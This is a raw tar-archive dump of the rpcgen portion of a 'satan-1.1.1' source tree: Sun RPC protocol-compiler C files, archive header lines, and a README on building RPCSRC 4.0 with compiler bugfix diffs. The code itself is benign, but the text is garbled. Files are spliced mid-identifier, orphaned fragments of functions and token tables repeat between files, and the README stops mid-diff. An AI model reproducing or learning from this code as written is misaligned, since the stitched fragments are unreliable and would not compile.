{TOK_TYPEDEF, "typedef"}, ... {TOK_ENUM, "enum"}, ... {TOK_OPAQUE, "opaque"}, ... {TOK_BOOL, "bool"}, ... {TOK_VOID, "void"}, ... {TOK_CHAR, "char"}, ... {TOK_INT, "int"}, ... {TOK_UNSIGNED, "unsigned"}, ... {TOK_SHORT, "short"}, ... {TOK_LONG, "long"}, ... {TOK_FLOAT, "float"}, ... {TOK_DOUBLE, "double"}, ... {TOK_STRING, "string"}, ... {TOK_PROGRAM, "program"}, ... {TOK_VERSION, "version"}, ... {TOK_EOF, "??????"}, }; static findkind(mark, tokp) .char **mark; .token *tokp; { .int len; .token *s; .char *str; .str = *mark; .for (s = symbols; s->kind != TOK_EOF; s++) { ..len = strlen(s->str); ..if (strncmp(str, s->str, len) == 0) { ...if (!isalnum(str[len]) && str[len] != '_') { ....tokp->kind = s->kind; ....tokp->str = s->str; ....*mark = str + len; ....return; ...} ..} .} .tokp->kind = TOK_IDENT; .for (len = 0; isalnum(str[len]) || str[len] == '_'; len++); .tokp->str = alloc(len + 1); .(void) strncpy(tokp->str, str, len); .tokp->str[len] = 0; .*mark = str + len; } static cppline(line) .char *line; { .return (line == curline && *line == '#'); } static directive(line) .char *line; { .return (line == curline && *line == '%'); } static printdirective(line) .char *line; { .f_print(fout, "%s", line + 1); } static docppline(line, lineno, fname) .char *line; .int *lineno; .char **fname; { .char *file; .int num; .char *p; .line++; .while (isspace(*line)) { ..line++; .} .num = atoi(line); .while (isdigit(*line)) { ..line++; .} .while (isspace(*line)) { ..line++; .} .if (*line != '"') { ..error("preprocessor error"); .} .line++; .p = file = alloc(strlen(line) + 1); .while (*line && *line != '"') { ..*p++ = *line++; .} .if (*line == 0) { ..error("preprocessor error"); .} .*p = 0; .if (*file == 0) { ..*fname = NULL; .} else { ..*fname = file; .} .*lineno = num - 1; } { .case ':': ..tokp->kind = TOK_COLON; ..where++; ..break; .case ';': ..tokp->kind = TOK_SEMICOLON; ..where++; ..break; .case ',': ..tokp->kind = TOK_COMMA; ..where++; ..break; .case '=': ..tokp->kind = TOK_EQUAL; ..where++; ..break; .case '*': ..tokp->kind = TOsatan-1.1.1/src/rpcgen/rpc_scan.h................................................................... 400 . 465 . 506 . 4323 4456447226 11714. .................................................................................... ................................................................................................................................................................................................................................................................. .............../* @(#)rpc_scan.h.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* @(#)rpc_scan.h 1.3 87/03/09 (C) 1987 SMI */ /* * rpc_scan.h, Definitions for the RPCL scanner * Copyright (C) 1987, Sun Microsystems, Inc. */ /* * kinds of tokens */ enum tok_kind { .TOK_IDENT, .TOK_STRCONST, .TOK_LPAREN, .TOK_RPAREN, .TOK_LBRACE, .TOK_RBRACE, .TOK_LBRACKET, .TOK_RBRACKET, .TOK_LANGLE, .TOK_RANGLE, .TOK_STAR, .TOK_COMMA, .TOK_EQUAL, .TOK_COLON, .TOK_SEMICOLON, .TOK_CONST, .TOK_STRUCT, .TOK_UNION, .TOK_SWITCH, .TOK_CASE, .TOK_DEFAULT, .TOK_ENUM, .TOK_TYPEDEF, .TOK_INT, .TOK_SHORT, .TOK_LONG, .TOK_UNSIGNED, .TOK_FLOAT, .TOK_DOUBLE, .TOK_OPAQUE, .TOK_CHAR, .TOK_STRING, .TOK_BOOL, .TOK_VOID, .TOK_PROGRAM, .TOK_VERSION, .TOK_EOF }; typedef enum tok_kind tok_kind; /* * a token */ struct token { .tok_kind kind; .char *str; }; typedef struct token token; /* * routine interface */ void scanprint(); void scan(); void scan2(); void scan3(); void scan_num(); void peek(); int peekscan(); void get_token(); har *p; .int size; .p = *str; .do { ..*p++; .} while (*p && *p != '"'); .if (*p == 0) { ..error("unterminated string constant"); .} .p++; .size = p - *str; .*val = alloc(size + 1); .(void) strncpy(*val, *str, size); .(*val)[size] = 0; .*str = p; } static findconst(str, val) .char **str; .char **valsatan-1.1.1/src/rpcgen/rpc_svcout.c................................................................. 600 . 465 . 506 . 16360 5741525624 12331. .......................................................................................... ................................................................................................................................................................................................................................................................. ........./* @(#)rpc_svcout.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_svcout.c 1.6 87/06/24 (C) 1987 SMI"; #endif /* * rpc_svcout.c, Server-skeleton outputter for the RPC protocol compiler * Copyright (C) 1987, Sun Microsytsems, Inc. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include "rpc_parse.h" #include "rpc_util.h" static char RQSTP[] = "rqstp"; static char TRANSP[] = "transp"; static char ARG[] = "argument"; static char RESULT[] = "result"; static char ROUTINE[] = "local"; static write_program(); static printerr(); static printif(); /* * write most of the service, that is, everything but the registrations. */ void write_most() { .list *l; .definition *def; .version_list *vp; .for (l = defined; l != NULL; l = l->next) { ..def = (definition *) l->val; ..if (def->def_kind == DEF_PROGRAM) { ...for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) { ....f_print(fout, "\nstatic void "); ....pvname(def->def_name, vp->vers_num); ....f_print(fout, "();"); ...} ..} .} .f_print(fout, "\n\n"); .f_print(fout, "main()\n"); .f_print(fout, "{\n"); .f_print(fout, "\tSVCXPRT *%s;\n", TRANSP); .f_print(fout, "\n"); .for (l = defined; l != NULL; l = l->next) { ..def = (definition *) l->val; ..if (def->def_kind != DEF_PROGRAM) { ...continue; ..} ..for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) { ...f_print(fout, "\t(void)pmap_unset(%s, %s);\n", def->def_name, vp->vers_name); ..} .} } /* * write a registration for the given transport */ void write_register(transp) .char *transp; { .list *l; .definition *def; .version_list *vp; .f_print(fout, "\n"); .f_print(fout, "\t%s = svc%s_create(RPC_ANYSOCK", TRANSP, transp); .if (streq(transp, "tcp")) { ..f_print(fout, ", 0, 0"); .} .f_print(fout, ");\n"); .f_print(fout, "\tif (%s == NULL) {\n", TRANSP); .f_print(fout, "\t\t(void)fprintf(stderr, \"cannot create %s service.\\n\");\n", transp); .f_print(fout, "\t\texit(1);\n"); .f_print(fout, "\t}\n"); .for (l = defined; l != NULL; l = l->next) { ..def = (definition *) l->val; ..if (def->def_kind != DEF_PROGRAM) { ...continue; ..} ..for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) { ...f_print(fout, ...."\tif (!svc_register(%s, %s, %s, ", ....TRANSP, def->def_name, vp->vers_name); ...pvname(def->def_name, vp->vers_num); ...f_print(fout, ", IPPROTO_%s)) {\n", ....streq(transp, "udp") ? "UDP" : "TCP"); ...f_print(fout, ...."\t\t(void)fprintf(stderr, \"unable to register (%s, %s, %s).\\n\");\n", ....def->def_name, vp->vers_name, transp); ...f_print(fout, "\t\texit(1);\n"); ...f_print(fout, "\t}\n"); ..} .} } /* * write the rest of the service */ void write_rest() { .f_print(fout, "\tsvc_run();\n"); .f_print(fout, "\t(void)fprintf(stderr, \"svc_run returned\\n\");\n"); .f_print(fout, "\texit(1);\n"); .f_print(fout, "}\n"); } void write_programs(storage) .char *storage; { .list *l; .definition *def; .for (l = defined; l != NULL; l = l->next) { ..def = (definition *) l->val; ..if (def->def_kind == DEF_PROGRAM) { ...write_program(def, storage); ..} .} } static write_program(def, storage) .definition *def; .char *storage; { .version_list *vp; .proc_list *proc; .int filled; .for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) { ..f_print(fout, "\n"); ..if (storage != NULL) { ...f_print(fout, "%s ", storage); ..} ..f_print(fout, "void\n"); ..pvname(def->def_name, vp->vers_num); ..f_print(fout, "(%s, %s)\n", RQSTP, TRANSP); ..f_print(fout, ".struct svc_req *%s;\n", RQSTP); ..f_print(fout, ".SVCXPRT *%s;\n", TRANSP); ..f_print(fout, "{\n"); ..filled = 0; ..f_print(fout, "\tunion {\n"); ..for (proc = vp->procs; proc != NULL; proc = proc->next) { ...if (streq(proc->arg_type, "void")) { ....continue; ...} ...filled = 1; ...f_print(fout, "\t\t"); ...ptype(proc->arg_prefix, proc->arg_type, 0); ...pvname(proc->proc_name, vp->vers_num); ...f_print(fout, "_arg;\n"); ..} ..if (!filled) { ...f_print(fout, "\t\tint fill;\n"); ..} ..f_print(fout, "\t} %s;\n", ARG); ..f_print(fout, "\tchar *%s;\n", RESULT); ..f_print(fout, "\tbool_t (*xdr_%s)(), (*xdr_%s)();\n", ARG, RESULT); ..f_print(fout, "\tchar *(*%s)();\n", ROUTINE); ..f_print(fout, "\n"); ..f_print(fout, "\tswitch (%s->rq_proc) {\n", RQSTP); ..if (!nullproc(vp->procs)) { ...f_print(fout, "\tcase NULLPROC:\n"); ...f_print(fout, "\t\t(void)svc_sendreply(%s, xdr_void, (char *)NULL);\n", TRANSP); ...f_print(fout, "\t\treturn;\n\n"); ..} ..for (proc = vp->procs; proc != NULL; proc = proc->next) { ...f_print(fout, "\tcase %s:\n", proc->proc_name); ...f_print(fout, "\t\txdr_%s = xdr_%s;\n", ARG, ....stringfix(proc->arg_type)); ...f_print(fout, "\t\txdr_%s = xdr_%s;\n", RESULT, ....stringfix(proc->res_type)); ...f_print(fout, "\t\t%s = (char *(*)()) ", ROUTINE); ...pvname(proc->proc_name, vp->vers_num); ...f_print(fout, ";\n"); ...f_print(fout, "\t\tbreak;\n\n"); ..} ..f_print(fout, "\tdefault:\n"); ..printerr("noproc", TRANSP); ..f_print(fout, "\t\treturn;\n"); ..f_print(fout, "\t}\n"); ..f_print(fout, "\tmemset((char *)&%s, 0, sizeof(%s));\n", ARG, ARG); ..printif("getargs", TRANSP, "&", ARG); ..printerr("decode", TRANSP); ..f_print(fout, "\t\treturn;\n"); ..f_print(fout, "\t}\n"); ..f_print(fout, "\t%s = (*%s)(&%s, %s);\n", RESULT, ROUTINE, ARG, ...RQSTP); ..f_print(fout, ..."\tif (%s != NULL && !svc_sendreply(%s, xdr_%s, %s)) {\n", ...RESULT, TRANSP, RESULT, RESULT); ..printerr("systemerr", TRANSP); ..f_print(fout, "\t}\n"); ..printif("freeargs", TRANSP, "&", ARG); ..f_print(fout, "\t\t(void)fprintf(stderr, \"unable to free arguments\\n\");\n"); ..f_print(fout, "\t\texit(1);\n"); ..f_print(fout, "\t}\n"); ..f_print(fout, "}\n\n"); .} } static printerr(err, transp) .char *err; .char *transp; { .f_print(fout, "\t\tsvcerr_%s(%s);\n", err, transp); } static printif(proc, transp, prefix, arg) .char *proc; .char *transp; .char *prefix; .char *arg; { .f_print(fout, "\tif (!svc_%s(%s, xdr_%s, %s%s)) {\n", ..proc, transp, arg, prefix, arg); } nullproc(proc) .proc_list *proc; { .for (; proc != NULL; proc = proc->next) { ..if (streq(proc->proc_num, "0")) { ...return (1); ..} .} .return (0); } n; ....return; ...} ..} .} .tokp->kind = TOK_IDENT; .for (len = 0; isalnum(str[len]) || str[len] == '_'; len++); .tokp->str = alloc(len + 1); .(void) strncpy(tokp->str, str, len); .tokp->str[len] = 0; .*mark = str + len; } static cppline(line) .char *line; { .return (linsatan-1.1.1/src/rpcgen/rpc_util.c................................................................... 600 . 465 . 506 . 17237 5741525632 11766. ......................................................................................... ................................................................................................................................................................................................................................................................. ........../* @(#)rpc_util.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_util.c 1.5 87/06/24 (C) 1987 SMI"; #endif /* * rpc_util.c, Utility routines for the RPC protocol compiler * Copyright (C) 1987, Sun Microsystems, Inc. */ #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include "rpc_scan.h" #include "rpc_parse.h" #include "rpc_util.h" char curline[MAXLINESIZE];./* current read line */ char *where = curline;./* current point in line */ int linenum = 0;./* current line number */ char *infilename;./* input filename */ #define NFILES 4 char *outfiles[NFILES];./* output file names */ int nfiles; FILE *fout;./* file pointer of current output */ FILE *fin;./* file pointer of current input */ list *defined;./* list of defined things */ static printwhere(); /* * Reinitialize the world */ reinitialize() { .memset(curline, 0, MAXLINESIZE); .where = curline; .linenum = 0; .defined = NULL; } /* * string equality */ streq(a, b) .char *a; .char *b; { .return (strcmp(a, b) == 0); } /* * find a value in a list */ char * findval(lst, val, cmp) .list *lst; .char *val; .int (*cmp) (); { .for (; lst != NULL; lst = lst->next) { ..if ((*cmp) (lst->val, val)) { ...return (lst->val); ..} .} .return (NULL); } /* * store a value in a list */ void storeval(lstp, val) .list **lstp; .char *val; { .list **l; .list *lst; .for (l = lstp; *l != NULL; l = (list **) & (*l)->next); .lst = ALLOC(list); .lst->val = val; .lst->next = NULL; .*l = lst; } static findit(def, type) .definition *def; .char *type; { .return (streq(def->def_name, type)); } static char * fixit(type, orig) .char *type; .char *orig; { .definition *def; .def = (definition *) FINDVAL(defined, type, findit); .if (def == NULL || def->def_kind != DEF_TYPEDEF) { ..return (orig); .} .switch (def->def.ty.rel) { .case REL_VECTOR: ..return (def->def.ty.old_type); .case REL_ALIAS: ..return (fixit(def->def.ty.old_type, orig)); .default: ..return (orig); .} } char * fixtype(type) .char *type; { .return (fixit(type, type)); } char * stringfix(type) .char *type; { .if (streq(type, "string")) { ..return ("wrapstring"); .} else { ..return (type); .} } void ptype(prefix, type, follow) .char *prefix; .char *type; .int follow; { .if (prefix != NULL) { ..if (streq(prefix, "enum")) { ...f_print(fout, "enum "); ..} else { ...f_print(fout, "struct "); ..} .} .if (streq(type, "bool")) { ..f_print(fout, "bool_t "); .} else if (streq(type, "string")) { ..f_print(fout, "char *"); .} else { ..f_print(fout, "%s ", follow ? fixtype(type) : type); .} } static typedefed(def, type) .definition *def; .char *type; { .if (def->def_kind != DEF_TYPEDEF || def->def.ty.old_prefix != NULL) { ..return (0); .} else { ..return (streq(def->def_name, type)); .} } isvectordef(type, rel) .char *type; .relation rel; { .definition *def; .for (;;) { ..switch (rel) { ..case REL_VECTOR: ...return (!streq(type, "string")); ..case REL_ARRAY: ...return (0); ..case REL_POINTER: ...return (0); ..case REL_ALIAS: ...def = (definition *) FINDVAL(defined, type, typedefed); ...if (def == NULL) { ....return (0); ...} ...type = def->def.ty.old_type; ...rel = def->def.ty.rel; ..} .} } static char * locase(str) .char *str; { .char c; .static char buf[100]; .char *p = buf; .while (c = *str++) { ..*p++ = (c >= 'A' && c <= 'Z') ? (c - 'A' + 'a') : c; .} .*p = 0; .return (buf); } void pvname(pname, vnum) .char *pname; .char *vnum; { .f_print(fout, "%s_%s", locase(pname), vnum); } /* * print a useful (?) error message, and then die */ void error(msg) .char *msg; { .printwhere(); .f_print(stderr, "%s, line %d: ", infilename, linenum); .f_print(stderr, "%s\n", msg); .crash(); } /* * Something went wrong, unlink any files that we may have created and then * die. */ crash() { .int i; .for (i = 0; i < nfiles; i++) { ..(void) unlink(outfiles[i]); .} .exit(1); } void record_open(file) .char *file; { .if (nfiles < NFILES) { ..outfiles[nfiles++] = file; .} else { ..f_print(stderr, "too many files!\n"); ..crash(); .} } static char expectbuf[100]; static char *toktostr(); /* * error, token encountered was not the expected one */ void expected1(exp1) .tok_kind exp1; { .s_print(expectbuf, "expected '%s'", ..toktostr(exp1)); .error(expectbuf); } /* * error, token encountered was not one of two expected ones */ void expected2(exp1, exp2) .tok_kind exp1, exp2; { .s_print(expectbuf, "expected '%s' or '%s'", ..toktostr(exp1), ..toktostr(exp2)); .error(expectbuf); } /* * error, token encountered was not one of 3 expected ones */ void expected3(exp1, exp2, exp3) .tok_kind exp1, exp2, exp3; { .s_print(expectbuf, "expected '%s', '%s' or '%s'", ..toktostr(exp1), ..toktostr(exp2), ..toktostr(exp3)); .error(expectbuf); } void tabify(f, tab) .FILE *f; .int tab; { .while (tab--) { ..(void) fputc('\t', f); .} } static token tokstrings[] = { ... {TOK_IDENT, "identifier"}, ... {TOK_CONST, "const"}, ... {TOK_RPAREN, ")"}, ... {TOK_LPAREN, "("}, ... {TOK_RBRACE, "}"}, ... {TOK_LBRACE, "{"}, ... {TOK_LBRACKET, "["}, ... {TOK_RBRACKET, "]"}, ... {TOK_STAR, "*"}, ... {TOK_COMMA, ","}, ... {TOK_EQUAL, "="}, ... {TOK_COLON, ":"}, ... {TOK_SEMICOLON, ";"}, ... {TOK_UNION, "union"}, ... {TOK_STRUCT, "struct"}, ... {TOK_SWITCH, "switch"}, ... {TOK_CASE, "case"}, ... {TOK_DEFAULT, "default"}, ... {TOK_ENUM, "enum"}, ... {TOK_TYPEDEF, "typedef"}, ... {TOK_INT, "int"}, ... {TOK_SHORT, "short"}, ... {TOK_LONG, "long"}, ... {TOK_UNSIGNED, "unsigned"}, ... {TOK_DOUBLE, "double"}, ... {TOK_FLOAT, "float"}, ... {TOK_CHAR, "char"}, ... {TOK_STRING, "string"}, ... {TOK_OPAQUE, "opaque"}, ... {TOK_BOOL, "bool"}, ... {TOK_VOID, "void"}, ... {TOK_PROGRAM, "program"}, ... {TOK_VERSION, "version"}, ... {TOK_EOF, "??????"} }; static char * toktostr(kind) .tok_kind kind; { .token *sp; .for (sp = tokstrings; sp->kind != TOK_EOF && sp->kind != kind; sp++); .return (sp->str); } static printbuf() { .char c; .int i; .int cnt; #.define TABSIZE 4 .for (i = 0; c = curline[i]; i++) { ..if (c == '\t') { ...cnt = 8 - (i % TABSIZE); ...c = ' '; ..} else { ...cnt = 1; ..} ..while (cnt--) { ...(void) fputc(c, stderr); ..} .} } static printwhere() { .int i; .char c; .int cnt; .printbuf(); .for (i = 0; i < where - curline; i++) { ..c = curline[i]; ..if (c == '\t') { ...cnt = 8 - (i % TABSIZE); ..} else { ...cnt = 1; ..} ..while (cnt--) { ...(void) fputc('^', stderr); ..} .} .(void) fputc('\n', stderr); } .f_print(fout, "char *"); .} else { ..f_print(fout, "%s ", follow ? fixtype(type) : type); .} } static typedefed(def, type) .definition *def; .char *type; { .if (def->def_kind != DEF_TYPEDEF || def->def.ty.old_prefix != NULL) { ..return (0); .} else { ..return (streq(def->def_name, type)); .} } isvectordef(type, rel) .char *type; .relation rel; { .satan-1.1.1/src/rpcgen/rpc_util.h................................................................... 600 . 465 . 506 . 5071 5741525511 11740. .................................................................................................... ................................................................................................................................................................................................................................................................/ * @(#)rpc_util.h.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* @(#)rpc_util.h 1.6 87/06/24 (C) 1987 SMI */ /* * rpc_util.h, Useful definitions for the RPC protocol compiler * Copyright (C) 1987, Sun Microsystems, Inc. */ #define alloc(size)..malloc((unsigned)(size)) #define ALLOC(object) (object *) malloc(sizeof(object)) #define s_print.(void) sprintf #define f_print (void) fprintf struct list { .char *val; .struct list *next; }; typedef struct list list; /* * Global variables */ #define MAXLINESIZE 1024 extern char curline[MAXLINESIZE]; extern char *where; extern int linenum; extern char *infilename; extern FILE *fout; extern FILE *fin; extern list *defined; /* * rpc_util routines */ void storeval(); #define STOREVAL(list,item).\ .storeval(list,(char *)item) char *findval(); #define FINDVAL(list,item,finder) \ .findval(list, (char *) item, finder) char *fixtype(); char *stringfix(); void pvname(); void ptype(); int isvectordef(); int streq(); void error(); void expected1(); void expected2(); void expected3(); void tabify(); void record_open(); /* * rpc_cout routines */ void cprint(); void emit(); /* * rpc_hout routines */ void print_datadef(); /* * rpc_svcout routines */ void write_most(); void write_register(); void write_rest(); void write_programs(); /* * rpc_clntout routines */ void write_stubs(); nst"}, ... {TOK_RPAREN, ")"}, ... {TOK_LPAREN, "("}, ... {TOK_RBRACE, "}"}, ... {TOK_LBRACE, "{"}, ... {TOK_LBRACKET, "["}, ... {TOK_RBRACKET, "]"}, ... {TOK_STAR, "*"}, ... {TOK_COMMA, ","}, ... {TOK_EQUAL, "="}, ... {TOK_COLON, ":"}, ... {TOK_SEMICOLON, ";"}, ... {TOK_UNION, "union"}, ... {TOK_STRUCT, "struct"}, ... {TOK_SWITCH, "switch"}, ... {TOK_CASE, "case"}, ... {TOK_DEFAULT, "defasatan-1.1.1/src/rpcgen/README....................................................................... 600 . 465 . 506 . 23402 5741526674 10657. .......................................................................... ................................................................................................................................................................................................................................................................. .........................This rpcgen source core comes from the freely distributable RPCSRC 4.0 release by Sun Microsystems, Inc (see README below). All I did was to make it easier to build in an ANSI and POSIX environment. No changes to program logic were needed. .Wietse RPCSRC 4.0 7/11/89 This distribution contains Sun Microsystem's implementation of the RPC and XDR protocols and is compatible with 4.2BSD and 4.3BSD. Also included is complete documentation, utilities, RPC service specification files, and demonstration services in the format used by the RPC protocol compiler (rpcgen). See WHAT'S NEW below for details. NOTE ABOUT SECURE RPC: This release of RPCSRC contains most of the code needed to implement Secure RPC (see "DES Authentication" in the RPC Protocol Specification, doc/rpc.rfc.ms). Due to legal considerations, we are unable to distribute an implementation of DES, the Data Encryption Standard, which Secure RPC requires. For this reason, all of the files, documentation, and programs associated with Secure RPC have been placed into a separate directory, secure_rpc. The RPC library contained in the main body of this release *DOES NOT* support Secure RPC. See secure_rpc/README for more details. (A DES library was posted in Volume 18 of comp.sources.unix.) If you wish to report bugs found in this release, send mail to: Portable ONC/NFS Sun Microsystems, Inc MS 12-33 2550 Garcia Avenue Mountain View, CA 94043 or send Email to nfsnet@sun.com (the Internet) or sun!nfsnet (Usenet). ROADMAP The directory hierarchy is as follows: demo/ Various demonstration services demo/dir Remote directory lister demo/msg Remote console message delivery service demo/sort Remote sort service doc/ Documentation for RPC, XDR and NFS in "-ms" format. etc/ Utilities (rpcinfo and portmap). portmap must be started by root before any other RPC network services are used. SEE BELOW FOR BUGFIX TO 4.3BSD COMPILER. man/ Manual pages for RPC library, rpcgen, and utilities. rpc/ The RPC and XDR library. SEE BELOW FOR BUGFIX TO 4.2BSD COMPILER. rpcgen/ The RPC Language compiler (for .x files) rpcsvc/ Service definition files for various services and the server and client code for the Remote Status service. secure_rpc/ The files in this directory are used to build a version of the RPC library with DES Authentication. See the README file in that directory for more details. BUILD INSTRUCTIONS Makefiles can be found in all directories except for man. The Makefile in the top directory will cause these others to be invoked (except for in the doc, man and demo directories), in turn building the entire release. WARNING! THE DEFAULT INSTALLATION PROCEDURES WILL INSTALL FILES IN /usr/include, /usr/lib, /usr/bin and /etc. The master RPC include file, rpc/rpc.h, is used by all programs and routines that use RPC. It includes other RPC and system include files needed by the RPC system. PLEASE NOTE: If your system has NFS, it may have been based on Sun's NFS Source. The include files installed by this package may duplicate include files you will find on your NFS system. The RPCSRC 4.0 include files are upwardly compatible to all NFS Source include files as of the date of this distribution (not including any new definitions or declarations added by your system vendor). HOWEVER: Please read the comments towards the end of rpc/rpc.h regarding rpc/netdb.h. You may need to uncomment the inclusion of that file if the structures it defines are already defined by your system's include files. After making any compiler fixes that are needed (see below), at the top directory, type: make install For all installations, the Makefile macro DESTDIR is prepended to the installation path. It is defined to be null in the Makefiles, so installations are relative to root. (You will probably need root privileges for installing the files under the default path.) To install the files under some other tree (e.g., /usr/local), use the command: make install DESTDIR=/usr/local This will place the include files in /usr/local/usr/include, the RPC library in /usr/local/usr/lib, rpcgen in /usr/local/usr/bin, and the utilities in /usr/local/etc. You'll have to edit the Makefiles or install the files by hand if you want to do anything other than this kind of relocation of the installation tree. The RPC library will be built and installed first. By default it is installed in /usr/lib as "librpclib.a". The directory /usr/include/rpc will also be created, and several header files will be installed there. ALL RPC SERVICES INCLUDE THESE HEADER FILES. The programs in etc/ link in routines from librpclib.a. If you change where it is installed, be sure to edit etc/'s Makefile to reflect this. These programs are installed in /etc. PORTMAP MUST BE RUNNING ON YOUR SYSTEM BEFORE YOU START ANY OTHER RPC SERVICE. rpcgen is installed in /usr/bin. This program is required to build the demonstration services in demo and the rstat client and server in rpcsvc/. The rpcsvc/ directory will install its files in the directory /usr/include/rpcsvc. The Remote Status service (rstat_svc) will be compiled and installed in /etc. If you wish to make this service available, you should either start this service when needed or have it started at boot time by invoking it in your /etc/rc.local script. (Be sure that portmap is started first!) Sun has modified its version of inetd to automatically start RPC services. (Use "make LIB=" when building rstat on a Sun Workstation.) The Remote Status client (rstat) will be installed in /usr/bin. This program queries the rstat_svc on a remote host and prints a system status summary similar to the one printed by "uptime". The documentation is not built during the "make install" command. Typing "make" in the doc directory will cause all of the manuals to be formatted using nroff into a single file. We have had a report that certain "troff" equivalents have trouble processing the full manual. If you have trouble, try building the manuals individually (see the Makefile). The demonstration services in the demo directory are not built by the top-level "make install" command. To build these, cd to the demo directory and enter "make". The three services will be built. RPCGEN MUST BE INSTALLED in a path that make can find. To run the services, start the portmap program as root and invoke the service (you probably will want to put it in the background). rpcinfo can be used to check that the service succeeded in getting registered with portmap, and to ping the service (see rpcinfo's man page). You can then use the corresponding client program to exercise the service. To build these services on a Sun workstation, you must prevent the Makefile from trying to link the RPC library (as these routines are already a part of Sun's libc). Use: "make LIB=". BUGFIX FOR 4.3BSD COMPILER The use of a 'void *' declaration for one of the arguments in the reply_proc() procedure in etc/rpcinfo.c will trigger a bug in the 4.3BSD compiler. The bug is fixed by the following change to the compiler file mip/manifest.h: *** manifest.h.r1.1.Thu Apr 30 13:52:25 1987 --- manifest.h.r1.2.Mon Nov 23 18:58:17 1987 *************** *** 21,27 **** /* * Bogus type values */ ! #define TNULL.PTR../* pointer to UNDEF */ #define TVOID.FTN../* function returning UNDEF (for void) */ /* --- 21,27 ---- /* * Bogus type values */ ! #define TNULL.INCREF(MOETY)./* pointer to MOETY -- impossible type */ #define TVOID.FTN../* function returning UNDEF (for void) */ /* If you cannot fix your compiler, change the declaration in reply_proc() from 'void *' to 'char *'. BUGFIX FOR 4.2BSD COMPILER Unpatched 4.2BSD compilers complain about valid C. You can make old compilers happy by changing some voids to ints. However, the fix to the 4.2 VAX compiler is as follows (to mip/trees.c): *** trees.c.r1.1.Mon May 11 13:47:58 1987 --- trees.c.r1.2.Wed Jul 2 18:28:52 1986 *************** *** 1247,1253 **** 